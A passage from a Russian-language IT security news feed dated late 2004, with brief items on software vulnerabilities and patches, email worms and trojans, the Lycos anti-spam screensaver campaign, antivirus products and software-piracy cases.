Компания StarForce, разработчик систем защиты ПО от копирования и взлома, объявила о выводе на российский розничный рынок нового программного продукта Safe’n’Sec. Новая программа позволяет обнаружить и блокировать любые виды несанкционированной деятельности, независимо от типа происходящей атаки. Как пояснил генеральный директор компании StarForce Михаил Калиниченко, «новый продукт не является антивирусом и не замена антивирусу. Он основан на методе анализа поведения. Например, если РС отправляет одно письмо в 10 секунд — это нормально, а вот если 10 писем в 1 секунду — это нестандартное поведение, которое контролируется и блокируется». В то же время г-н Калиниченко предупредил, что «новая технология — не панацея, она блокирует активность вредоносных программ, предотвращая ущерб, а сигнатурные системы уничтожают вирус. Поэтому целесообразно совмещение несколько антивирусных ядер и нашей технологии». Первая версия программы предназначена для малого и среднего бизнеса, она не требует дополнительного обслуживания и обойдется пользователям в $25–35.
Источник

8/12/2004 16:07 Уязвимость в GetRight
Secunia сообщает об обнаруженной уязвимости в популярном download-менеджере GetRight. Уязвимость обнаружена в версии 5.2a, более ранние версии также могут быть уязвимы. Уязвимость, о которой сообщила ATmaCA, возникает из-за ошибки при поверки границ буфера в сторонней библиотеке DUNZIP32.dll, которая используется для обработки файлов скинов. Уязвимость может быть задействована удаленно при закачке с веб сайта специально созданного пакета со скином и вызвать переполнение буфера, что может привести к выполнению произвольного кода на уязвимосй машине. Обновление до версии 5.2b доступно на сайте www.getright.com.
Источник

8/12/2004 15:13 «РЖД» за год отразило 5 тысяч хакерских атак
С начала года специалисты ОАО «Российские железные дороги» отразили 5 тысяч хакерских атак на информационные системы и телекоммуникационные сети, грозившие компании ущербом в 1 млрд. рублей. Об этом на традиционном селекторном совещании с начальниками филиалов компании во вторник сообщил президент «РЖД» Геннадий Фадеев, сообщает Вебпланета. В свою очередь, как сообщили «Итар-Тасс» в Управлении К МВД России, «ежегодно количество выявленных органами внутренних дел преступлений в сфере IT-технологий увеличивается в 1,8–2 раза». Если в 1997 году в России «было зафиксировано 17 преступлений такого рода, то в минувшем году их число перевалило за 10 тысяч, а первом полугодии нынешнего стабилизировалось на уровне около 4 300 преступлений». Из 1 673 уголовных дел, возбужденных по материалам региональных подразделений управления в первом полугодии, 55% связаны с неправомерным использованием сетевых реквизитов при авторизации в интернете, 10,6% проходят как «компьютерное пиратство» — распространение контрафактной программной продукции в том числе с использованием интернета.
Источник

8/12/2004 15:11 Троян маскируется под скринсейвер Lycos
Проявляются все новые последствия антиспамерской кампании Lycos: теперь хакеры используют ее, чтобы подбросить пользователям e-mail троян, перехватывающий пароли. Троян, распространяющийся в интернете в виде e-mail-вложения, маскируется под антиспамерский скринсейвер Lycos. Антивирусная компания F-Secure утверждает, что он регистрирует нажатия клавиш, перехватывая таким образом имена пользователей, пароли, данные кредитных карт и адреса e-mail. Директор по антивирусным исследованиям F-Secure Микко Хиппонен говорит, что недавнее повышенное внимание к Lycos может побудить людей открыть вложенный файл. В строке subject электронного письма говорится: «Станьте первым борцом против спама со скринсейвером Lycos». А вложенный файл называется: Lycos screensaver to fight spam.zip. В пятницу Lycos прекратила свою кампанию Make Love Not Spam.
Источник

7/12/2004 12:41 Microsoft вводит платную поддержку Windows NT4
Microsoft объявила о возможности поддержки Windows NT4 в течении еще двух лет при условии оплаты.Ранее представители корпорации заявляли, что поддержка системы NT 4 Server прекращается в конце 2004 г., а настольной NT4 — в июне следующего года. Для получения поддержки пользователи Windows NT4 должны подписать соответствующий контракт. Руководство корпорации планирует выпускать платные патчи чаще, чем ранее — не только на уязвимости, получившие рейтинг «критические», но и на «существенные». Стоимость поддержки пока не указывается. Однако представители Microsoft сообщили, что цена не будет уменьшаться для владельцев большого количества лицензий. Аналогичный план будет предложен для пользователей Exchange 5.5, бесплатная поддержка которого прекратится в конце 2005 г.
Источник

7/12/2004 12:38 Lycos капитулировала перед спамерами
Lycos прекратила распространение программы-скринсейвера, атакующей спамерские сайты. Программа предлагалась бесплатно в течении недели через сайт Makelovenotspam. За это время скринсейвер загрузили 100 тыс. пользователей. Идея, реализованная в решении, заключалась в постоянной перегрузке известных спамерских сайтов путем увеличения трафика. Разработчики ожидали, что это приведет к закрытию многих из них. В ответ спамеры предприняли столь масштабные DoS-атаки, что Lycos пришлось приостановить распространение программы.
Источник

7/12/2004 12:35 Открыт крупнейший в России FTP-архив свободно распространяемых программ
Объем нового файлового архива FTP.CITKIT.RU составляет более 2-х терабайт. Это на данный момент самый крупный архив свободного софта в России. К архиву обеспечен качественный высокоскоростной доступ (гигабитный канал до MSK-IX). Для примера, в данный момент архив содержит зеркала таких проектов, как SourceForge, FreeBSD, NetBSD, OpenBSD, Linux дистрибутивов Fedora, Mandrake, Debian, Gentoo, Slackware, ALTLinux, ASPLinux, Knoppix, а также Mozilla, KDE, GNOME, PostgreSQL, MySQL, OpenOffice, CPAN, XFree86, X.org, GNU архив и т.д.
Источник

7/12/2004 12:35 Вышла финальная версия Mozilla Thunderbird
После недолгого бета-тестирования вышла финальная версия почтового клиента от Mozilla Foundation -- Mozilla Thunderbird 1.0. Изменения по сравнению с предыдущей версией незначительные и касаются в основном графического интерфейса.
Источник

6/12/2004 18:36 Две китайские компании обвинены Microsoft в пиратстве
По сообщению China View, две китайские компании были наказаны национальным управлением по авторским правам (NCA) за производство ПО, нарушающегося права Microsoft. Beijing Zhongxinlian и Tianjin Minzu выпускали диски с Windows XP Home Edition для компьютеров Lenovo без согласия компании Microsoft. Управление начало расследование после получения прошения со стороны Microsoft в июне этого года. Компания Beijing Zhongxinlian выпустила около 55 тыс. дисков с ПО Microsoft с ноября 2001 по июль 2003. Tianjin Minzu произвела 4 тыс. таких дисков в 2002 году. Оба производителя были наказаны незначительными штрафами. Однако компания Microsoft намерена довести дело до суда и взыскать с них понесенные убытки.
Источник

6/12/2004 18:33 Microsoft преследует в суде отправителей порнографического спама
Компания Microsoft подала семь новых судебных исков против спамеров, обвинив их в рассылке писем, содержащих материалы порнографического содержания, без должного уведомления. По словам представителей Microsoft, ответчики, чьи личности еще только предстоит установить, нарушили федеральный закон США о спаме, который предусматривает обязательное оповещение о материалах сексуального характера в письмах. В первой строке тела письма и в строке "Тема" должна размещаться надпись "SEXUALLY-EXPLICIT". Компания Microsoft, которая ведет борьбу со спамерами в рамках собственной инициативы Trustworthy Computing с целью повышения безопасности своих программ и услуг, подала уже более 100 исков против отправителей почтовой рекламы, сообщает Reuters.
Источник

6/12/2004 18:32 Вышел пакет обновлений MP2 для "Антивируса Касперского Personal 5.0"
"Лаборатория Касперского" выпустила пакета обновлений Maintenance Pack 2 для "Антивируса Касперского Personal 5.0". В MP2 значительно улучшена система обновлений статусной информации. Добавлен модуль детектирования и блокирования сетевых атак, т.е. программа теперь наделена функциями персонального файрволла. Добавлено также резервное хранилище для оригинальных объектов. По умолчанию программа не запрашивает пароль для архивов и позволяет на старте запускать пропущенные обновления.
Источник

3/12/2004 17:07 Обнародован план релиза FreeBSD 4.11
На сайте FreeBSD опубликован план следующего стабильного релиза операционной системы из четвертой ветки — 4.11-RELEASE. По его данным первый кандидат в релиз (4.11-RC) выйдет уже 17 декабря, а финальная версия FreeBSD 4.11 появится во второй половине января 2005 года (анонс запланирован на 24 января).
nixp.ru

3/12/2004 15:31 Статья о способах обхода антивирусов
Debasis Mohanty из Индии опубликовал довольно интересную статью под названием "Anti-Virus Evasion Techniques and Countermeasures", в которой он описывает основные технологии, применяемые авторами вирусов, червей и троянов для обхождения защиты, используемой разработчиками антивирусов. Также приведены контрмеры, которые должны применяться для противодействия.
Cтатья

3/12/2004 14:50 Sun придумала лицензию для Solaris?
Компания Sun Microsystems представила на рассмотрение Open Source Initiative лицензию Common Development and Distribution License, базирующуюся на Mozilla Public License, сообщает linuxcenter.ru. Ее условия позволяют изучать, изменять и распространять исходный код приложения, при условии, что все модификации также являются open-source. Было бы логично предположить, что именно CDDL компания и собирается использовать для Open Solaris, однако, пресс-секретарь Sun не стал ни подтверждать, ни опровергать эту догадку. В то же самое время, CDDL не совместима с GPL, а это означает, что Solaris и Linux не смогут обмениваться кодом друг с другом. Впрочем, наивно было бы ожидать чего-то другого: вся суета вокруг открытия Solaris направлена на то, чтобы создать конкурирующую с Linux систему. А конкурентам, как известно, особо не помогают.
Подробности

3/12/2004 13:09 Сервера BitTorrent подверглись DDoS-атаке
Одна из крупнейших пиринговых сетей, предназначенная для обмена цифровым видео, музыкой и даже книгами, была проверена на прочность неизвестными злоумышленниками, атаковавшими несколько узлов сети. Атака, как сообщает CNET со ссылкой на LokiTorrent, продолжалась в течение десяти часов и была направлена сразу на несколько узлов, отвечающих за маршрутизацию трафика. Как известно, популярность BitTorrent основывается на использовании уникальной технологии передачи файлов не единым куском, а небольшими фрагментами, которые зачастую находятся на разных машинах и собираются с помощью узловых серверов, координирующих закачку. Именно эти сервера и стали жертвами неизвестных агрессоров. Владельцы сети пока затрудняются прокомментировать события и назвать предполагаемых организаторов атаки.
Internet.Ru

3/12/2004 12:30 Комплексное обновление для Mac OS X
Компания Apple выпустила комплексное обновление для Mac OS X, которое носит название Security Update 2004-12-02. Обновление устраняет 16 уязвимостей в различных компонентах операционных систем семейства Mac OS X: Mac OS X 10.2.8 Client/Server, Mac OS X 10.3.6 Client/Server. Cреди заплат присутствуют заплаты для следующих систем: Вэб-сервера Apache, Appkit, Cyrus IMAP, HIToolbox, Kerberos, почтового сервера Postfix, PSNormalize, QuickTime Streaming Server, браузера Safari, Terminal. Всем пользователям ОС настоятельно рекомендуют обновиться.
Подробности

3/12/2004 11:46 МР3 теперь доступен в версии surround
Компания Thomson объявила о том, что самый популярный в мире компрессированный аудиоформат стал многоканальным. Это удалось достичь благодаря сотрудничеству института Fraunhofer, разработчика формата МР3, и компании Agere Systems. Технология позволит обеспечить 5.1-канальный звук для передачи по интернету, проигрыванию на ПК и в других аудиоустройствах. Битрейт сравним с уже использующимися стереро МР3-форматом. На веб-сайте www.mp3surround-format.com пользователи смогут скачать бесплатное ПО, образцы файлов в новом стандарте и детальную информацию о МР3 surround.
CNews

3/12/2004 11:20 "Испанский" червь Pawur уничтожает пользовательские данные
Компания "Лаборатория Касперского" предупреждает о появлении новой вредоносной программы Pawur. Этот вирус распространяется по электронной почте в виде вложений с расширением ZIP. В поле "Тема" и тексте рассылаемых писем указываются различные фразы на испанском языке. При инсталляции червь копирует себя в системный каталог Windows под именем "Command.pif" и регистрирует этот файл в ключе автоматической загрузки реестра ОС. Далее вредоносная программа пытается удалить с доступных накопителей все файлы с определенными расширениями, в том числе DOC, XLS, MP3, WAV, JPG, RAR и пр.
Описание

3/12/2004 10:38 Антиспамерский скринсейвер поразил две цели в Китае
Кампания Make love not spam, организованная порталом Lycos Europe, привела к прекращению доступа к некоторым веб-сайтам, занесенным Lycos в список спамеров. Как сообщает фирма Netcraft, наблюдающая за интернет-трафиком, Lycos Europe успешно вывела из строя два веб-сайта, размещенных в Китае — bokwhdok.com и printmediaprofits.biz. «Распределенная атака на отказ в обслуживании (DDoS), устроенная пользователями скринсейвера MakeLoveNotSpam от Lycos Europe, успешно поразила несколько спамерских сайтов, но другие целевые сайты остаются доступными», — говорится в сообщении Netcraft. Lycos Europe отказалась от комментариев, но во вторник компания заявила, что она не проводит атак DDoS, а только затрудняет доступ к целевым сайтам, и что у нее нет намерения вывести эти сайты из строя. «Я настаиваю на том, что это не атака denial-of-service, — сказал директор по коммуникационным службам Lycos Мальте Поллманн. — Мы только сузили полосу пропускания до 5%. Организация атак DDoS была бы не в наших интересах. Наша цель — увеличить расходы спамеров. Мы хотим сделать это занятие экономически невыгодным».
Подробнее

3/12/2004 10:21 НР анонсировала новую концепцию антивируса для серверов
В будущем году НР начнет продавать серверное ПО, которое засекает вирус по его поведению, а затем подавляет соответствующий процесс. НР анонсировала новую концепцию антивируса, которым с будущего года начнет снабжать свои серверы ProLiant и сетевое оборудование ProCurve. Позднее планируется выпустить версию ПО и для персональных компьютеров. Программа, подавляющая распространение вирусов, даст администраторам время на подготовку к атаке, пояснил главный технолог HP Services Тони Редмонд на конференции НР по компьютерной безопасности в Сан-Франциско. Временной лаг между обнаружением уязвимости и появлением вируса становится все короче, и вирусы распространяются с головокружительной быстротой, отметил он. «Десять лет назад все опасались атак через флоппи-диски. Люди переходили с зараженной дискетой от ПК к ПК. Пять лет назад, когда свирепствовали вирусы I Love You и Melissa, мы стали свидетелями внезапного ускорения угрозы. Сегодня вирусы и черви распространяются со скоростью вычислений — уже неподвластной человеку». ПО НР — результат интенсивных исследований HP Labs. Компания получила 16 патентов на технологию, связанную с подавлением вирусов. Программа может отличать нормальное поведение процессов на сервере от поведения при вирусных атаках. «Злокачественные процессы, такие как черви или вирусы, обычно устанавливают соединение одного и того же типа с необычно высокой частотой, — сказал Редмонд. — Если за одну минуту процесс обращается к одному и тому же сокету на 1000 систем, какой можно сделать вывод? Скорее всего, это действует не пользователь и не легитимный процесс сервера». Чем быстрее вирус пытается распространяться, тем легче его отличить от обычных вычислительных задач. Быстрое распространение представляет серьезную опасность для сетей и серверов; SQL Slammer атаковал 79 тыс. систем в течение 31 минуты. Обнаружив вирус с подобными характеристиками, программа замедляет этот процесс, не оказывая влияния на обычные процессы. «В конечном счете она подавляет его полностью», — сказал Редмонд.
ZDNet

3/12/2004 09:50 Обзор вирусной активности от "Лаборатории Касперского"
Опубликован традиционный, ежемесячный обзор вирусной активности от "ЛК". Согласн этому обзору, на первом месте с 21.59% значится троян Bagle.at, на втором - 11,52% - Mydoom.ab. На третьем - с 8,70% - NetSky.q. Ноябрь 2004 года ознаменовался сменой лидеров вирусной 20-ки. Обнаруженные в самом конце октября почтовые черви Mydoom.ab и Bagle.at (успевшие попасть в октябрьский рейтинг на 14 и 7 места соответственно), настоящие обороты набрали именно в ноябре и оккупировали две верхние строчки. Причем Mydoom.ab переместился вверх сразу на 12 позиций, что является одним из рекордных показателей всего 2004 года в целом. В целом же, по сравнению с прошлыми месяцами, в 20-ке наблюдается резкое изменение ситуации. В рейтинге появилось 4 новых вредоносных программы, причем каждая из них представляет собой отдельное семейство почтовых червей. Наиболее интересными из них, на наш взгляд, являются Bofra.b и Sober.i.
Описание

3/12/2004 09:15 Бывший глава ЦРУ назвал Интернет "ахиллесовой пятой США"
Бывший глава ЦРУ Джордж Тенет (George J. Tenet) призвал усилить меры безопасности в Интернете, сообщает The Washington Times. Он назвал всемирую сеть "черным ходом" для террористов и врагов США и "потенциальной ахиллесовой пятой" в обеспечении финансовой стабильности и физической безопасности государства. "Я знаю, что эти предложения могут показаться спорными в настоящее время, когда мы все еще думаем, что Интернет - свободное и открытое общество без контроля и ответственности, - сказал Тенет, выступая на конференции по информационно-технологической безопасности, проходящей в Вашингтоне, - Но в конечном итоге Дикий Запад должен уступить место управлению и контролю." По словам Тенета, противники страны, включая разведывательные службы и военные организации, разрабатывают планы по информационному нападению на США. Значительную опасность продолжает представлять террористическая организация "Аль Каеда". Он также отметил потенциальную опасность модернизации ключевых отраслей промышленности в стране. Подключение военных предприятий, государственных учреждений к Интернету делает их значительно более уязвимыми, полагает Тенет. Он призвал промышленников идти впереди, "устанавливая и предписывая" стандарты безопасности.
Подробности

2/12/2004 15:41 Уязвимость в FreeBSD
В бюллетене разработчиков ОС FreeBSD SA-04:17.procfs сообщается об обнаружении уязвимости в реализации файловой системе procfs, применяемой во многих *NIX-системах. Реализация псевдофайла /proc/curproc/cmdline в файловой системе procfs(5) во FreeBSD 4.х и 5.х и псевдофайла /proc/self/cmdline в файловой системе linprocfs(5) во FreeBSD 5.x считывает вектор аргументов процесса из адресного пространства процеса. Во время этой операции происходит переопределение указателя без проведения всех необходимых проверок. Из-за подобного поведения локальный пользователь может вызвать ситуацию паники ядра, в результате чего может произойти отказ в обслуживании (DoS). В другой ситуации можно получить доступ к памяти ядра, что может привести к утечке важной системной информации - например пароль из буферов терминала и т.д.
Бюллетень по безопасности

2/12/2004 14:18 ПК в Сети атакуют 300 раз в час
Компьютерная среда стала опасна, как никогда - для того, чтобы подвергнуть свой компьютер атаке хакеров или воздействию вирусов, достаточно подключить его к интернету и оставить без присмотра на несколько минут. Причем в подавляющем числе случаев речь идёт об автоматизированном вторжении, человек в нём участия не принимает. По данным IDC, 67% компьютеров по всему миру заражены шпионскими программами (spyware). К этой категории ПО исследователи относят также и незапрашиваемые рекламные материалы (adware). ПК заражаются для двух основных целей: хищение информации личного характера и отслеживание персональной активности в Сети. По мнению аналитиков IDC, необходимость выявлять и уничтожать программы-паразиты увеличит выручку компаний-поставщиков антишпионского ПО с $12 млн. в 2003 году до $305 млн. в 2008 году. Параллельно журналисты газеты USA Today совместно со специалистами фирмы Avantgarde провели эксперимент, продолжавшийся 2 недели. В ходе опыта были задействованы 6 компьютеров-приманок, его целью было узнать, какое количество потенциально вредоносного трафика они привлекут. Во избежание распространения атак на другие компьютеры, тестовые машины останавливались, как только происходило заражение. Тест не оценивал атаки, которые требуют человеческого участия — например, шпионские программы, которые распространяются после посещения определённым образом сконфигурированных веб-сайтов или почтовые вирусы, активизирующиеся после открытия вложений в электронных письмах. Эксперимент проводился под надзором Кевина Митника (Kevin Mitnick) и Райена Расселла (Ryan Russell), независимого исследователя вопросов компьютерной безопасности, автора нескольких книг. В опыте использовались типы компьютеров, популярные среди и домашних, и корпоративных пользователей — четыре настольных компьютера производства Dell, работающие под различными конфигурациями операционной системы Windows XP, один Apple Macintosh и один Microtel Linspire, работающий под управлением Linux. Каждый из этих ПК был подключен к интернету через широкополосное DSL-соединение.
Подробности

2/12/2004 13:46 Компания "Доктор Веб" тоже борется со шпионским ПО
Компания "Доктор Веб" начала бета-тестирование дополнительной вирусной базы drwnasty.vdb, которая позволяет детектировать шпионское и рекламное ПО. Базы adware и spyware, входящие в состав предлагаемого к бета-тестированию нового продукта, будут также доступны и на онлайновой проверке. В результате даже не принимающие участие в бета-тестировании пользователи смогут моментально проверить вызывающий подозрение файл на наличие в нем шпионских функций. Все детектируемые базой drwnasty.vdb файлы определяются как "неизлечимые", и удаляются, что следует учесть при настройке. Желающие принять участие в бета-тестировании нового продукта могут заполнить заявку на специальной странице для бета-тестеров. При выборе продукта для тестирования следует выбрать ту операционную среду, под которой требуется проводить тестирование.
OXPAHA.ru

2/12/2004 13:32 Нарушителей прав интеллектуальной собственности привлекут к ответственности
Координационный совет по борьбе с правонарушениями в сфере интеллектуальной собственности Украины принял решение о разработке жестких мер к нарушителям украинского законодательства в названной сфере. На заседании Координационного совета в конце октября в Госдепартаменте интеллектуальной собственности указывалось, что наказание продавца нелицензионной продукции штрафом – неэффективное воздействие. Следует отметить, что большинство правонарушителей привлекаются к административной ответственности за нарушения в сфере интеллектуальной собственности по ст.164-9 «Незаконное распространение экземпляров аудиовизуальных произведений, фонограмм, видеограмм, компьютерных программ, баз данных». Однодневная же прибыль оштрафованной «точки» может в несколько раз превышать сумму административного взыскания. Поэтому члены совета решили разработать ходатайство в соответствующие структуры и обязать директоров рынков отвечать за торговлю незаконным товаром на территории своего хозяйства. Комплекс мероприятий по борьбе с незаконным производством, распространением и реализацией аудио- и видеопродукции, компакт-дисков, разрабатываемый в настоящее время Координационным советом, предусматривают заинтересованное участие государства, исполнительных и коммерческих структур одновременно. Среди прочих причин, тормозящих работу по искоренению «пиратства» в Украине, называются нехватка инспекторов в регионах и несовершенная законодательная база. Так, возбуждение уголовного дела за преступление в интеллектуальной собственности сопровождается чрезвычайно длительным процессом следствия, низким уровнем компетентности судейства в вопросах интеллектуальной собственности. Представители правоохранительных органов констатировали случаи, когда в результате судебного решения контрафактная продукция возвращалась правонарушителю. Госдепартамент интеллектуальной собственности выступил с инициативой организовать за рубежом стажировку судей, в процессуальную специализацию которых входит интеллектуальная собственность.
Crime-Research.ru

2/12/2004 12:11 В OpenBSD ядро интегрирован код PPPoE клиента
Как сообщает opennet.ru, В CVS OpenBSD внесен код PPPoE клиента (без поддержки IPv6), работающего на уровне ядра, реализация портирована из NetBSD (код PPPoE сервера был портирован пол года назад). С одной стороны ошибка в PPPoE реализации внутри ядра может отразится на надежности системы в целом, с другой - из-за исключения переключений и пересылок данных между уровнем ядра и пользовательским уровнем, положительно сказывается на производительности.
Подробности

2/12/2004 11:40 Уязвимость в браузере Netscape 7 в Sun Solaris
Продолжая тему выпущенных Sun бюллетеней, сообщаем, что компания выпустила также бюллетень 57683, в котором сообщается об уязвимости, которая присутствует во включённом в дистрибутивы Solaris браузере Netscape 7. Cобственно. уязвимость связана не с самим браузером, а с библиотекой libpng(3), которую использует браузер при просмотре графических файлов в формате PNG (Portable Network Graphics). Наличие уязвимости позволяет удалённому пользователю, поместившему на свою страницу специальный PNG-файл выполнить в системе произвольные команды с привилегиями пользователя, от имени которого был запущен браузер. Уязвимость присутствует в версиях Solaris 7, 8, 9 для обоих платформ. Как отмечает компания, браузер Netscape 7 инсталлируется в систему после получения обновления Solaris 9 Update 3 и более поздних. Также браузер доступен для версий Solaris 7,8,9 через Sun Download Center (SDLC) в составе пакета SUNWnsb. Cудя по всему, обновление пока не выпущено и реомендуется пользоваться другим браузером.
Бюллетень Sun

2/12/2004 11:17 Уязвимость в Sun Solaris
Компания Sun выпустила бюллетень по безопасности, в котором констатируется наличие уязвимости в популярной сетевой утилите ping. Уязвимость связана с ошибкой проверки границ выделяемого буфера в реализации кода утилиты. Использование подобной уязвимости позволяет локальному пользователю выполнять произвольные команды с повышенными привилегиями. Уязвимости подвержены следующие версии ОС Solaris - 7,8,9 для обоих платформ - SPARC и x86. Выпущены патчи для всех ОС. В качестве временной меры (до наложения патча) рекомендуется выполнить 2 вещи. Первое - снять бит SUID с ping - chmod u-s /usr/sbin/ping (что непозволит никому, кроме рута запускать эту утилиту). Второе - внести изменения в /etc/system: a) set noexec_user_stack = 1, б) set noexec_user_stack_log = 1. Второй вариант будет работать только на архитектурах sun4u, sun4m, sun4d (см. uname -a) и не будет работать на платформе x86.
Бюллетень Sun

2/12/2004 10:53 Помнить пароли больше не обязательно
Компания SecurIT выпустила систему Zshell, предназначенную для обеспечения двухфакторной аутентификации пользователей в приложениях с использованием электронных ключей и смарт-карт. Данный продукт относится к классу Single Sign-On и избавляет пользователей от необходимости запоминать, вводить и периодически менять пароли для доступа к различным приложениям. Как утверждают разработчики, внедрение Zshell позволит хранить все пароли в защищенной памяти электронных ключей или смарт-карт, и извлекать их оттуда по мере необходимости. ПО Zshell распознает появление на экране диалогового окна запроса имени пользователя и пароля для входа в приложение и автоматически подставляет в него считанные из электронного ключа значения. Это уже пятый продукт в линейке SecurIT, и третий - в семействе продуктов для клиентских рабочих станций. В настоящее время Zshell протестирован для доступа ко многим приложениям, среди которых - приложения Microsoft Office, Outlook Express, The Bat, Lotus Notes, 1С:Предприятие, Sales Expert, F-Secure SSH Client и др. Стоимость лицензии Zshell на одно рабочее место составляет 35 долл.
"Открытые системы"

2/12/2004 10:27 Уязвимость в ядре Linux
Paul Starzetz при внимательном изучении ChangeLog нового ядра версии 2.4.28 обнаружил, что в эту версию ядра не было включено исправление, которое позволяет локальному пользователю повысить свои привилегии в системе. Уязвимость связана с некорректным размещением в памяти ядра полученных датаграмм. Патч для версии 2.4.28 выпущен.
Описание

2/12/2004 09:22 Microsoft выпустила критическое исправление для IE - MS04-40
В среду Microsoft опубликовала поправку для Internet Explorer, устраняющую обнаруженный месяц назад пробел в защите браузера, который использовался для распространения вирусов и атак на ПК через рекламные баннеры. Уязвимость, которую Microsoft называет ошибкой Internet Explorer Elements, известна как iFrame. Проблема — которая не касается систем Microsoft Windows ХР с установленным обновлением Service Pack 2 — позволяет злоумышленникам перехватывать управление ПК, если пользователь зарегистрирован в системе с правами администратора. Пользователи домашних компьютеров обычно так и поступают. Представитель Microsoft сказал, что софтверный гигант выпустил поправку, не дожидаясь срока очередного планового обновления, который приходится на 7 декабря, поскольку данная ошибка уже используется злоумышленниками для атак на персональные компьютеры. «Это один из факторов, которые мы учитываем — когда ведутся активные атаки и заказчики могут пострадать», — пояснил Стивен Тулуз, менеджер программы безопасности Microsoft Security Response Center. Уязвимость может применяться для перехвата управления компьютером, когда жертва открывает простую веб-ссылку. В результате атаки злоумышленник получает возможность устанавливать программы, просматривать, модифицировать или удалять данные и создавать новые учетные записи. Поправка вышла более чем через месяц после первой публикации об уязвимости iFrame в открытых списках рассылки, посвященных компьютерной безопасности. Microsoft обрушилась на исследователей с критикой, призывая их давать разработчикам хотя бы месяц на исправление проблем, прежде чем обнародовать информацию о них в публичных форумах.
Обновление

2/12/2004 09:15 Россия построит аналог GPS вместе с Индией
Россия и Индия подпишут соглашение о стратегическом партнерстве в строительстве, развитии и эксплуатации российской спутниковой системы глобального позиционирования ГЛОНАСС. Как сообщил глава Роскосмоса Анатолий Перминов, предварительная договоренность о сотрудничестве двух стран уже заключена. По его словам, Россия и Индия также намерены подписать межправительственное соглашение об использовании космического пространства в мирных целях, передает агентство РИА "Новости". Как сообщил Перминов, к 2007 году Россия при участии Индии планирует увеличить орбитальную группировку ГЛОНАСС до 18 спутников, что позволит системе полноценно работать на территории обеих стран. На сегодняшний день в рамках программы ГЛОНАСС запущены только 11 спутников. Чтобы система покрывала весь земной шар, необходимо вывести на орбиту 24 спутника. Перминова отметил, что по условиям соглашения навигационные спутники будут выводить в космос как на российских, так и на индийских ракетах. Запуски планируется выполнять с космодромов России и Индии. По словам главы Роскосмоса, договоренность предусматривает перевод российской навигационной системы на новые космические аппараты ГЛОНАСС-М и ГЛОНАСС-К. В перспективе Перминов обещает довести точность позиционирования до 1 метра. Как сообщил реководитель Роскосмоса, ГЛОНАСС будет работать на коммерческих началах. По его словам, пример американской навигационной системы GPS показал, что коммерческая эксплуатация навигационных спутников очень выгодна. Говоря о партнерстве с Индией, Перминов отметил, что по объемам финансирования гражданских программ космической отрасли Индия в ближайшие пять лет опередит Россию.
РИА "Новости"

1/12/2004 11:50 В новом Netscape скрестили Firefox и Internet Explorer
Не прошло и двух недель с момента появления новости о том, что AOL выпустит новое поколение браузера Netscape, как тестеры получили доступ к первой бета-версии нового Netscape. Вышла она, как и было обещано, 30 ноября. Появившаяся версия имеет малопонятный номер 0.5.6+. Если учесть, что созданные на базе Mozilla 1.x версии Netscape использовали индексы 7.x, можно было бы предположить, что новая версия станет восьмой. Однако не исключено, что в AOL решили начать нумерацию версий, что называется с нуля. Изначально было известно, что основой нового Netscape станет браузер Firefox. Действительно, внешне Netscape 0.5.6+ напоминает Firefox с альтернативной интерфейсной темой и кучей дополнительных кнопок и панелей, привязанных к сервисам AOL. В данных о программе сказано, что она основана на Firefox 0.9.3. Однако на деле все оказалось не так просто. В одном из специфичных для нового Netscape меню Site Controls имеется очень интересный пункт - Display like Internet Explorer (показывать как в Internet Explorer). Выбор этого пункта приведет к тому, что вместо движка Gecko, используемого во всех версиях Mozilla и Netscape 6.x/7.x будет использоваться движок Trident, на котором основан Internet Explorer 6. В этом случае новый Netscape превращается, по сути, в очередную надстройку над Internet Explorer. Разработчики, впрочем указывают, что использование двух разных движков делает браузер более гибким, позволяя просматривать сайты, ориентированные на браузер Microsoft.
Более подробно

1/12/2004 09:49 AirTight представила первый Wi-Fi брандмауэр
Компания AirTight Networks, ранее называвшаяся Wibhu Technologies, представила первый в индустрии брандмауэр для сетей Wi-Fi. Решение предназначено для определения и блокировки угроз без прерывания WLAN-трафика. Через графический интерфейс в режиме реального времени брандмауэр предоставляет информацию о радиопокрытии, выделении каналов и скорости соединений. В решение встроена система автоматического предотвращения вторжений (Intrusion Prevention System). SpectraGuard включает серверы SpectraGuard и распределенные сенсоры радиочастот. Серверы анализируют информацию, поступившую от RF-сенсоров и определяют угрозы в соответствии с установленной политикой обеспечения безопасности. Несанкционированный трафик блокируется. Управляется решение через веб-интерфейс по протоколу безопасных соединений (SSL) с браузеров Internet Explorer 5.5 или Netscape 7.0. Продукт совместим с Windows 2000, Windows XP и Linux, сообщил Сxotoday.
CNews

1/12/2004 09:15 "Кавказ-центр" переезжает обратно в Литву
Министерство иностранных дел России обратилось к официальным властям Литвы за разъяснениями по поводу возобновления работы в этой стране интернет-сайта чеченских сепаратистов "Кавказ-центр", сообщает РИА "Новости" со ссылкой на департамент информации и печати МИДа. "Позиция России относительно характера этого сайта и наше отношение к его деятельности хорошо известны литовской стороне. Мы уже обратились в МИД Литвы за разъяснениями по этому поводу", - говорится в сообщении департамента. По данным РИА, работа сайта "Кавказ-центр" на литовской территории возобновилась после решения, принятого свыше недели назад вторым участковым судом Вильнюса, который снял ограничения на деятельность сайта на территории страны. Сообщается, что ресурс вновь работает на площадке провайдера Elnet, а национальный оператор связи Lietuvos Telekomas разблокировал IP-адрес сервера, где находился "Кавказ-центр". Вильнюсский суд постановил, что ограничений для функционирования сайта нет, его хозяева не нарушали закона, и иное решение может принять лишь Конституционный суд. Сайт был заблокирован 18 сентября в результате усилий Департамента госбезопасности (ДГБ) и правительства Литвы. На 17 декабря в суде назначено рассмотрение дела о законности этих действий. Между тем, в настоящее время обращение к "Кавказ-центру" по-прежнему приводит к соединению с шведским провайдером Port80, где сайт размещался и раньше после действий литовских властей. Также поступала информация о том, что сайт некоторое время находился на хостинге в Финляндии.
Lenta.Ru

30/11/2004 16:04 Смартфонам нанесён двойной удар
